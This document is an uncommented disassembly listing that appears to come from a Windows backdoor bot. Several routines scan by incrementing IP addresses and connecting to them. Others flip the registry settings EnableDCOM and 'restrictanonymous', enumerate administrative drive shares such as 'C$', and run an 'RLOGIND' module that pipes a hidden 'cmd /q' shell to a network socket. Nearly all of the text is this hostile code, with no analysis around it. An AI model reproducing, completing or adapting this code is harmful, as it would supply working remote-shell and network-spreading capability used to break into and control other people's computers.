sub_4126D1 proc near ; CODE XREF: sub_4011D6�j
var_B8 = dword ptr -0B8h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0B8h
mov eax, [ebp+arg_0]
push esi
push edi
push 2Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_B8]
push 1
rep movsd
pop esi
mov [eax+0A4h], esi
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_415CA0
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+var_34]
call dword_49165C ; htons
mov [ebp+var_E], ax
mov eax, [ebp+var_28]
push 6
push esi
push 2
mov [ebp+var_C], eax
call dword_4916DC ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_41278F
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call dword_491604 ; connect
mov ecx, [ebp+var_2C]
imul ecx, 234h
cmp eax, 0FFFFFFFFh
mov dword_43E92C[ecx], esi
jz short loc_41278F
push [ebp+var_34]
push [ebp+var_28]
call dword_4916E8 ; inet_ntoa
push eax
mov edi, offset dword_492510
push offset dword_434B90
push edi
call sub_416821
push 0
lea eax, [ebp+var_B4]
push [ebp+var_20]
push edi
push eax
push [ebp+var_B8]
call sub_4010D2
push edi
call sub_401014
add esp, 28h
loc_41278F: ; CODE XREF: sub_4126D1+5D�j
; sub_4126D1+7E�j
push esi
call dword_4916F4 ; closesocket
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_4126D1 endp
; ---------------------------------------------------------------------------
db 33h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_4127D1 proc near ; CODE XREF: sub_4010C8�j
var_130 = byte ptr -130h
var_B0 = byte ptr -0B0h
var_2C = dword ptr -2Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 130h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push 2Ah
mov esi, ebx
pop ecx
lea edi, [ebp+var_B0]
rep movsd
mov esi, ds:dword_495324
mov dword ptr [ebx+0A0h], 1
xor edi, edi
loc_4127FF: ; CODE XREF: sub_4127D1+EC�j
push [ebp+var_2C]
push [ebp+var_20]
call dword_4916E8 ; inet_ntoa
push eax
lea eax, [ebp+var_130]
push offset dword_434BC8
push eax
call sub_416821
lea eax, [ebp+var_130]
push 1FFh
push eax
mov eax, [ebp+var_24]
imul eax, 234h
add eax, offset dword_43E720
push eax
call sub_416A10
add esp, 1Ch
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_B0]
push edi
push eax
push offset sub_4011D6
push edi
push edi
call ds:dword_49532C ; CreateThread
cmp eax, edi
mov [ebp+var_4], eax
jz short loc_41286B
loc_412860: ; CODE XREF: sub_4127D1+98�j
cmp [ebp+var_C], edi
jnz short loc_41286B
push 32h
call esi ; Sleep
jmp short loc_412860
; ---------------------------------------------------------------------------
loc_41286B: ; CODE XREF: sub_4127D1+8D�j
; sub_4127D1+92�j
push [ebp+var_4]
call ds:dword_495358 ; CloseHandle
push dword ptr [ebx+88h]
mov [ebx+0A4h], edi
call esi ; Sleep
lea eax, [ebp+var_20]
push 4
push eax
lea eax, [ebp+arg_0]
push eax
call sub_415960
add esp, 0Ch
push [ebp+arg_0]
call dword_491590 ; htonl
inc eax
push eax
mov [ebp+arg_0], eax
call dword_491658 ; htonl
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push 4
push eax
lea eax, [ebp+var_20]
push eax
call sub_415960
add esp, 0Ch
jmp loc_4127FF
sub_4127D1 endp
; ---------------------------------------------------------------------------
db 3Ch dup(0CCh)
; ---------------------------------------------------------------------------
loc_4128FE: ; CODE XREF: sub_401127�j
push ebp
mov ebp, esp
sub esp, 98h
mov eax, [ebp+8]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp-98h]
rep movsd
pop edi
pop esi
push dword ptr [ebp-8]
cmp dword ptr [ebp-10h], 0
mov dword ptr [eax+94h], 1
lea eax, [ebp-94h]
push dword ptr [ebp-0Ch]
push eax
push dword ptr [ebp-98h]
jz short loc_412945
call sub_401172
jmp short loc_41294A
; ---------------------------------------------------------------------------
loc_412945: ; CODE XREF: .text:0041293C�j
call sub_4011DB
loc_41294A: ; CODE XREF: .text:00412943�j
add esp, 10h
push dword ptr [ebp-14h]
call sub_4012A3
pop ecx
push 0
call ds:dword_495334 ; ExitThread
; ---------------------------------------------------------------------------
db 18h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412976 proc near ; CODE XREF: sub_401172�j
var_214 = byte ptr -214h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push esi
push edi
xor edi, edi
cmp dword_49172C, edi
jnz loc_412AA8
lea eax, [ebp+var_4]
mov esi, 80000002h
push eax
push 2001Fh
push edi
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
push esi
call dword_4916CC ; RegOpenKeyExA
test eax, eax
jnz short loc_412A01
mov ax, word_434FD0
mov word ptr [ebp+var_8+2], ax
lea eax, [ebp+var_8+2]
push eax
call sub_4158E0
pop ecx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push edi
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call dword_491680 ; RegSetValueExA
test eax, eax
jz short loc_4129E3
push offset unk_434F88
jmp short loc_4129E8
; ---------------------------------------------------------------------------
loc_4129E3: ; CODE XREF: sub_412976+64�j
push offset dword_434F58
loc_4129E8: ; CODE XREF: sub_412976+6B�j
lea eax, [ebp+var_214]
push eax
call sub_416821
pop ecx
pop ecx
push [ebp+var_4]
call dword_491638 ; RegCloseKey
jmp short loc_412A14
; ---------------------------------------------------------------------------
loc_412A01: ; CODE XREF: sub_412976+36�j
lea eax, [ebp+var_214]
push offset unk_434F10
push eax
call sub_416821
pop ecx
pop ecx
loc_412A14: ; CODE XREF: sub_412976+89�j
cmp [ebp+arg_C], edi
jnz short loc_412A33
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4010D2
add esp, 14h
loc_412A33: ; CODE XREF: sub_412976+A1�j
lea eax, [ebp+var_214]
push eax
call sub_401014
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push edi
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call dword_4916CC ; RegOpenKeyExA
test eax, eax
jnz short loc_412AA1
lea eax, [ebp+var_8]
push 4
push eax
push 4
push edi
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], 1
call dword_491680 ; RegSetValueExA
test eax, eax
jz short loc_412A83
push offset unk_434EA4
jmp short loc_412A88
; ---------------------------------------------------------------------------
loc_412A83: ; CODE XREF: sub_412976+104�j
push offset unk_434E58
loc_412A88: ; CODE XREF: sub_412976+10B�j
lea eax, [ebp+var_214]
push eax
call sub_416821
pop ecx
pop ecx
push [ebp+var_4]
call dword_491638 ; RegCloseKey
jmp short loc_412ABB
; ---------------------------------------------------------------------------
loc_412AA1: ; CODE XREF: sub_412976+E2�j
push offset unk_434E04
jmp short loc_412AAD
; ---------------------------------------------------------------------------
loc_412AA8: ; CODE XREF: sub_412976+13�j
push offset unk_434DC0
loc_412AAD: ; CODE XREF: sub_412976+130�j
lea eax, [ebp+var_214]
push eax
call sub_416821
pop ecx
pop ecx
loc_412ABB: ; CODE XREF: sub_412976+129�j
cmp [ebp+arg_C], edi
jnz short loc_412ADA
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4010D2
add esp, 14h
loc_412ADA: ; CODE XREF: sub_412976+148�j
lea eax, [ebp+var_214]
push eax
call sub_401014
cmp dword_491754, edi
pop ecx
jnz loc_412C55
push ebx
mov [ebp+var_4], edi
mov [ebp+var_14], edi
mov [ebp+var_C], edi
loc_412AFD: ; CODE XREF: sub_412976+2C3�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push 0FFFFFFFFh
push eax
push 1F6h
push edi
call dword_4915A8
cmp eax, edi
mov [ebp+var_10], eax
jz short loc_412B9A
cmp eax, 0EAh
jz short loc_412B9A
mov esi, offset off_434C10
loc_412B2E: ; CODE XREF: sub_412976+21D�j
push dword ptr [esi]
push edi
call sub_40107D
pop ecx
pop ecx
push dword ptr [esi]
test eax, eax
jnz short loc_412B45
push offset unk_434D8C
jmp short loc_412B4A
; ---------------------------------------------------------------------------
loc_412B45: ; CODE XREF: sub_412976+1C6�j
push offset unk_434D4C
loc_412B4A: ; CODE XREF: sub_412976+1CD�j
lea eax, [ebp+var_214]
push 200h
push eax
call sub_4163D7
add esp, 10h
cmp [ebp+arg_C], edi
jnz short loc_412B7D
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4010D2
add esp, 14h
loc_412B7D: ; CODE XREF: sub_412976+1EB�j
lea eax, [ebp+var_214]
push eax
call sub_401014
add esi, 8
pop ecx
cmp esi, offset dword_434C30
jl short loc_412B2E
jmp loc_412C32
; ---------------------------------------------------------------------------
loc_412B9A: ; CODE XREF: sub_412976+1AA�j
; sub_412976+1B1�j
mov esi, [ebp+var_8]
push 1
pop ebx
cmp [ebp+var_4], ebx
jb loc_412C29
loc_412BA9: ; CODE XREF: sub_412976+2AF�j
mov edi, [esi]
push edi
call sub_417CEF
cmp word ptr [edi+eax*2-2], 24h
pop ecx
jnz short loc_412C1E
push edi
call sub_40114F
push eax
push 0
call sub_40107D
add esp, 0Ch
push dword ptr [esi]
test eax, eax
jnz short loc_412BD8
push offset unk_434D18
jmp short loc_412BDD
; ---------------------------------------------------------------------------
loc_412BD8: ; CODE XREF: sub_412976+259�j
push offset unk_434CD8
loc_412BDD: ; CODE XREF: sub_412976+260�j
lea eax, [ebp+var_214]
push 200h
push eax
call sub_4163D7
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_412C11
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4010D2
add esp, 14h
loc_412C11: ; CODE XREF: sub_412976+27F�j
lea eax, [ebp+var_214]
push eax
call sub_401014
pop ecx
loc_412C1E: ; CODE XREF: sub_412976+242�j
add esi, 28h
inc ebx
cmp ebx, [ebp+var_4]
jbe short loc_412BA9
xor edi, edi
loc_412C29: ; CODE XREF: sub_412976+22D�j
push [ebp+var_8]
call dword_4916EC
loc_412C32: ; CODE XREF: sub_412976+21F�j
cmp [ebp+var_10], 0EAh
jz loc_412AFD
lea eax, [ebp+var_214]
push offset unk_434C9C
push eax
call sub_416821
pop ecx
pop ecx
pop ebx
jmp short loc_412C68
; ---------------------------------------------------------------------------
loc_412C55: ; CODE XREF: sub_412976+177�j
lea eax, [ebp+var_214]
push offset unk_434C58
push eax
call sub_416821
pop ecx
pop ecx
loc_412C68: ; CODE XREF: sub_412976+2DD�j
cmp [ebp+arg_C], edi
jnz short loc_412C86
push edi
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4010D2
add esp, 14h
loc_412C86: ; CODE XREF: sub_412976+2F5�j
lea eax, [ebp+var_214]
push eax
call sub_401014
pop ecx
push 1
pop eax
pop edi
pop esi
leave
retn
sub_412976 endp
; ---------------------------------------------------------------------------
db 0C9h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412D63 proc near ; CODE XREF: sub_4011DB�j
var_220 = byte ptr -220h
var_20 = byte ptr -20h
var_14 = byte ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 220h
push ebx
xor ebx, ebx
cmp dword_49172C, ebx
push esi
jnz loc_412E91
lea eax, [ebp+var_4]
mov esi, 80000002h
push eax
push 2001Fh
push ebx
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
push esi
call dword_4916CC ; RegOpenKeyExA
test eax, eax
jnz short loc_412DEE
mov ax, word_4351E4
mov word ptr [ebp+var_8+2], ax
lea eax, [ebp+var_8+2]
push eax
call sub_4158E0
pop ecx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push ebx
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call dword_491680 ; RegSetValueExA
test eax, eax
jz short loc_412DD0
push offset unk_4351B0
jmp short loc_412DD5
; ---------------------------------------------------------------------------
loc_412DD0: ; CODE XREF: sub_412D63+64�j
push offset dword_435180
loc_412DD5: ; CODE XREF: sub_412D63+6B�j
lea eax, [ebp+var_220]
push eax
call sub_416821
pop ecx
pop ecx
push [ebp+var_4]
call dword_491638 ; RegCloseKey
jmp short loc_412E01
; ---------------------------------------------------------------------------
loc_412DEE: ; CODE XREF: sub_412D63+36�j
lea eax, [ebp+var_220]
push offset unk_434F10
push eax
call sub_416821
pop ecx
pop ecx
loc_412E01: ; CODE XREF: sub_412D63+89�j
cmp [ebp+arg_C], ebx
jnz short loc_412E20
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4010D2
add esp, 14h
loc_412E20: ; CODE XREF: sub_412D63+A1�j
lea eax, [ebp+var_220]
push eax
call sub_401014
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push ebx
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call dword_4916CC ; RegOpenKeyExA
test eax, eax
jnz short loc_412E8A
lea eax, [ebp+var_8]
push 4
push eax
push 4
push ebx
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], ebx
call dword_491680 ; RegSetValueExA
test eax, eax
jz short loc_412E6C
push offset unk_435128
jmp short loc_412E71
; ---------------------------------------------------------------------------
loc_412E6C: ; CODE XREF: sub_412D63+100�j
push offset unk_4350DC
loc_412E71: ; CODE XREF: sub_412D63+107�j
lea eax, [ebp+var_220]
push eax
call sub_416821
pop ecx
pop ecx
push [ebp+var_4]
call dword_491638 ; RegCloseKey
jmp short loc_412EA4
; ---------------------------------------------------------------------------
loc_412E8A: ; CODE XREF: sub_412D63+E2�j
push offset unk_435088
jmp short loc_412E96
; ---------------------------------------------------------------------------
loc_412E91: ; CODE XREF: sub_412D63+13�j
push offset unk_434DC0
loc_412E96: ; CODE XREF: sub_412D63+12C�j
lea eax, [ebp+var_220]
push eax
call sub_416821
pop ecx
pop ecx
loc_412EA4: ; CODE XREF: sub_412D63+125�j
cmp [ebp+arg_C], ebx
jnz short loc_412EC3
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4010D2
add esp, 14h
loc_412EC3: ; CODE XREF: sub_412D63+144�j
lea eax, [ebp+var_220]
push eax
call sub_401014
cmp dword_491754, ebx
pop ecx
jnz loc_413035
push edi
mov esi, offset off_434C10
mov edi, 200h
loc_412EE7: ; CODE XREF: sub_412D63+1E9�j
push dword ptr [esi+4]
push dword ptr [esi]
push ebx
call sub_40132F
add esp, 0Ch
push dword ptr [esi]
test eax, eax
jnz short loc_412F02
push offset unk_435054
jmp short loc_412F07
; ---------------------------------------------------------------------------
loc_412F02: ; CODE XREF: sub_412D63+196�j
push offset unk_435018
loc_412F07: ; CODE XREF: sub_412D63+19D�j
lea eax, [ebp+var_220]
push edi
push eax
call sub_4163D7
add esp, 10h
cmp [ebp+arg_C], ebx
jnz short loc_412F36
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4010D2
add esp, 14h
loc_412F36: ; CODE XREF: sub_412D63+1B7�j
lea eax, [ebp+var_220]
push eax
call sub_401014
add esi, 8
pop ecx
cmp esi, offset off_434C20
jl short loc_412EE7
loc_412F4E: ; DATA XREF: .data:off_4356E0�o
call ds:dword_495408 ; GetLogicalDrives
test eax, eax
mov [ebp+var_4], eax
mov bl, 41h
jz loc_41301D
loc_412F61: ; CODE XREF: sub_412D63+2B4�j
mov eax, [ebp+var_4]
and eax, 1
cmp al, 1
jnz loc_413012
cmp bl, 41h
jz loc_413012
movsx esi, bl
push esi
push offset aC_0 ; "%c$"
lea eax, [ebp+var_14]
push 0Ah
push eax
call sub_4163D7
push esi
push offset aC ; "%c:\\"
lea eax, [ebp+var_20]
push 0Ah
push eax
call sub_4163D7
add esp, 20h
lea eax, [ebp+var_20]
push eax
call dword_4916BC ; GetDriveTypeA
cmp eax, 3
jnz short loc_413012
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14]
push eax
push 0
call sub_40132F
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_14]
push eax
jnz short loc_412FD0
push offset unk_435054
jmp short loc_412FD5
; ---------------------------------------------------------------------------
loc_412FD0: ; CODE XREF: sub_412D63+264�j
push offset unk_435018
loc_412FD5: ; CODE XREF: sub_412D63+26B�j
lea eax, [ebp+var_220]
push edi
push eax
call sub_4163D7
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_413005
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4010D2
add esp, 14h
loc_413005: ; CODE XREF: sub_412D63+286�j
lea eax, [ebp+var_220]
push eax
call sub_401014
pop ecx
loc_413012: ; CODE XREF: sub_412D63+206�j
; sub_412D63+20F�j ...
inc bl
shr [ebp+var_4], 1
jnz loc_412F61
loc_41301D: ; CODE XREF: sub_412D63+1F8�j
lea eax, [ebp+var_220]
push offset unk_434FD4
push eax
call sub_416821
pop ecx
xor ebx, ebx
pop ecx
pop edi
jmp short loc_413048
; ---------------------------------------------------------------------------
loc_413035: ; CODE XREF: sub_412D63+173�j
lea eax, [ebp+var_220]
push offset unk_434C58
push eax
call sub_416821
pop ecx
pop ecx
loc_413048: ; CODE XREF: sub_412D63+2D0�j
cmp [ebp+arg_C], ebx
jnz short loc_413066
push ebx
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4010D2
add esp, 14h
loc_413066: ; CODE XREF: sub_412D63+2E8�j
lea eax, [ebp+var_220]
push eax
call sub_401014
pop ecx
push 1
pop eax
pop esi
pop ebx
leave
retn
sub_412D63 endp
; ---------------------------------------------------------------------------
db 0C5h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_41313F proc near ; CODE XREF: sub_401276�j
; sub_41313F+1C�j
push 1
push 0
push 0
push 0
call sub_401172
add esp, 10h
push dword_434C08
call ds:dword_495324 ; Sleep
jmp short sub_41313F
sub_41313F endp
; ---------------------------------------------------------------------------
db 7 dup(0CCh)
; ---------------------------------------------------------------------------
loc_413164: ; CODE XREF: .text:0040135C�j
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
mov edi, [ebp+8]
push edi
call sub_413309
imul edi, 234h
mov esi, eax
xor ebx, ebx
mov eax, dword_43E92C[edi]
mov dword ptr [ebp-0Ch], 0Ch
mov [ebp-8], ebx
mov [ebp-4], ebx
mov [esi+0Ch], eax
mov edi, ds:dword_49532C
pop ecx
lea eax, [ebp+8]
push eax
push ebx
push esi
push offset sub_41354F
lea eax, [ebp-0Ch]
push ebx
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+10h], eax
jnz short loc_4131CF
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
push offset aRlogindFailedT ; "[RLOGIND]: Failed to create ReadShell s"...
call sub_4012B2
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
pop ecx
jmp short loc_413209
; ---------------------------------------------------------------------------
loc_4131CF: ; CODE XREF: .text:004131B4�j
lea eax, [ebp+8]
push eax
push ebx
push esi
push offset sub_41362D
lea eax, [ebp-0Ch]
push ebx
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+14h], eax
jnz short loc_413210
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
push offset aRlogindFailedT ; "[RLOGIND]: Failed to create ReadShell s"...
call sub_4012B2
pop ecx
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
push ebx
push dword ptr [esi+14h]
call ds:dword_4953B4 ; TerminateThread
loc_413209: ; CODE XREF: .text:004131CD�j
xor eax, eax
jmp loc_4132B0
; ---------------------------------------------------------------------------
loc_413210: ; CODE XREF: .text:004131E6�j
mov eax, [esi+10h]
push 0FFFFFFFFh
mov [ebp-18h], eax
mov eax, [esi+14h]
mov [ebp-14h], eax
mov eax, [esi+8]
mov [ebp-10h], eax
lea eax, [ebp-18h]
push ebx
push eax
push 3
call ds:dword_49540C ; WaitForMultipleObjects
sub eax, ebx
jz short loc_41326A
dec eax
jz short loc_413264
dec eax
jz short loc_413250
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
push offset aRlogindWaitfor ; "[RLOGIND]: WaitForMultipleObjects error"...
call sub_4012B2
pop ecx
pop ecx
jmp short loc_41327F
; ---------------------------------------------------------------------------
loc_413250: ; CODE XREF: .text:00413239�j
mov edi, ds:dword_4953B4
push ebx
push dword ptr [esi+14h]
call edi ; TerminateThread
push ebx
push dword ptr [esi+10h]
call edi ; TerminateThread
jmp short loc_41327F
; ---------------------------------------------------------------------------
loc_413264: ; CODE XREF: .text:00413236�j
push ebx
push dword ptr [esi+10h]
jmp short loc_41326E
; ---------------------------------------------------------------------------
loc_41326A: ; CODE XREF: .text:00413233�j
push ebx
push dword ptr [esi+14h]
loc_41326E: ; CODE XREF: .text:00413268�j
call ds:dword_4953B4 ; TerminateThread
push 1
push dword ptr [esi+8]
call ds:dword_4953F8 ; TerminateProcess
loc_41327F: ; CODE XREF: .text:0041324E�j
; .text:00413262�j
push dword ptr [esi+10h]
mov edi, ds:dword_495358
call edi ; CloseHandle
push dword ptr [esi+14h]
call edi ; CloseHandle
push dword ptr [esi+8]
call edi ; CloseHandle
push dword ptr [esi]
call edi ; CloseHandle
push dword ptr [esi+4]
call edi ; CloseHandle
push dword ptr [esi+0Ch]
call dword_4916F4 ; closesocket
push esi
call sub_415D6C
pop ecx
push 1
pop eax
loc_4132B0: ; CODE XREF: .text:0041320B�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
db 54h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413309 proc near ; CODE XREF: .text:00413171�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
xor edi, edi
push 18h
mov [ebp+var_4], edi
mov [ebp+var_8], edi
call sub_415CF8
mov esi, eax
pop ecx
cmp esi, edi
jz loc_4133F3
mov ebx, ds:dword_495410
lea eax, [ebp+var_14]
push edi
push eax
lea eax, [ebp+var_8]
mov [esi], edi
push eax
mov [esi+4], edi
push esi
mov [ebp+var_14], 0Ch
mov [ebp+var_10], edi
mov [ebp+var_C], 1
call ebx ; CreatePipe
mov edi, ds:dword_495358
test eax, eax
jnz short loc_41336C
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_0 ; "[RLOGIND]: Failed to create shell stdou"...
jmp short loc_41338C
; ---------------------------------------------------------------------------
loc_41336C: ; CODE XREF: sub_413309+53�j
lea eax, [ebp+var_14]
push 0
push eax
lea eax, [esi+4]
push eax
lea eax, [ebp+var_4]
push eax
call ebx ; CreatePipe
test eax, eax
jnz short loc_413394
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_1 ; "[RLOGIND]: Failed to create shell stdin"...
loc_41338C: ; CODE XREF: sub_413309+61�j
call sub_4012B2
pop ecx
jmp short loc_4133C2
; ---------------------------------------------------------------------------
loc_413394: ; CODE XREF: sub_413309+75�j
push [ebp+arg_0]
push [ebp+var_8]
push [ebp+var_4]
call sub_413440
add esp, 0Ch
mov [esi+8], eax
push [ebp+var_4]
call edi ; CloseHandle
push [ebp+var_8]
call edi ; CloseHandle
cmp dword ptr [esi+8], 0
jnz short loc_4133F7
push offset aRlogindFaile_2 ; "[RLOGIND]: Failed to execute shell."
call sub_401014
loc_4133C2: ; CODE XREF: sub_413309+89�j
cmp [ebp+var_4], 0
pop ecx
jz short loc_4133CE
push [ebp+var_4]
call edi ; CloseHandle
loc_4133CE: ; CODE XREF: sub_413309+BE�j
cmp [ebp+var_8], 0
jz short loc_4133D9
push [ebp+var_8]
call edi ; CloseHandle
loc_4133D9: ; CODE XREF: sub_413309+C9�j
mov eax, [esi]
test eax, eax
jz short loc_4133E2
push eax
call edi ; CloseHandle
loc_4133E2: ; CODE XREF: sub_413309+D4�j
mov eax, [esi+4]
test eax, eax
jz short loc_4133EC
push eax
call edi ; CloseHandle
loc_4133EC: ; CODE XREF: sub_413309+DE�j
push esi
call sub_415D6C
pop ecx
loc_4133F3: ; CODE XREF: sub_413309+1D�j
xor eax, eax
jmp short loc_4133FD
; ---------------------------------------------------------------------------
loc_4133F7: ; CODE XREF: sub_413309+AD�j
or dword ptr [esi+0Ch], 0FFFFFFFFh
mov eax, esi
loc_4133FD: ; CODE XREF: sub_413309+EC�j
pop edi
pop esi
pop ebx
leave
retn
sub_413309 endp
; ---------------------------------------------------------------------------
db 3Eh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413440 proc near ; CODE XREF: sub_413309+94�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
push 44h
pop edi
xor esi, esi
push edi
lea eax, [ebp+var_58]
push esi
push eax
mov [ebp+var_4], esi
call sub_415CA0
push 10h
lea eax, [ebp+var_14]
push esi
push eax
call sub_415CA0
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
add esp, 18h
mov [ebp+var_20], eax
lea eax, [ebp+var_18]
mov [ebp+var_58], edi
mov edi, ds:dword_4953F4
push esi
push 1
push 2
push eax
mov [ebp+var_54], esi
mov [ebp+var_4C], esi
mov [ebp+var_50], esi
mov [ebp+var_3C], esi
mov [ebp+var_40], esi
mov [ebp+var_44], esi
mov [ebp+var_48], esi
mov [ebp+var_28], si
mov [ebp+var_24], esi
mov [ebp+var_26], si
mov [ebp+var_2C], 101h
mov [ebp+var_1C], ebx
call edi ; GetCurrentProcess
push eax
push ebx
call edi ; GetCurrentProcess
push eax
call ds:dword_495414 ; DuplicateHandle
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push esi
push 1
push esi
push esi
push offset aCmdQ ; "cmd /q"
push esi
call ds:dword_495354 ; CreateProcessA
test eax, eax
jz short loc_4134FC
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_C]
imul eax, 234h
push [ebp+var_10]
mov esi, [ebp+var_14]
mov dword_43E928[eax], ecx
call ds:dword_495358 ; CloseHandle
jmp short loc_413512
; ---------------------------------------------------------------------------
loc_4134FC: ; CODE XREF: sub_413440+9A�j
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_3 ; "[RLOGIND]: Failed to execute shell, err"...
call sub_4012B2
mov esi, [ebp+var_4]
pop ecx
pop ecx
loc_413512: ; CODE XREF: sub_413440+BA�j
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_413440 endp
; ---------------------------------------------------------------------------
db 36h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41354F proc near ; DATA XREF: .text:004131A3�o
var_1B0 = byte ptr -1B0h
var_C8 = byte ptr -0C8h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1B0h
push ebx
push esi
mov ebx, ds:dword_49538C
push edi
mov edi, [ebp+arg_0]
lea eax, [ebp+arg_0]
push 0
push eax
lea eax, [ebp+var_C8]
push 0C8h
push eax
push dword ptr [edi]
loc_413578: ; CODE XREF: sub_41354F+8F�j
call ebx ; ReadFile
test eax, eax
jz short loc_4135E0
xor eax, eax
xor dl, dl
xor esi, esi
cmp [ebp+arg_0], eax
jbe short loc_4135B3
loc_413589: ; CODE XREF: sub_41354F+62�j
mov cl, [ebp+esi+var_C8]
cmp cl, 0Ah
jnz short loc_4135A3
cmp dl, 0Dh
jz short loc_4135A3
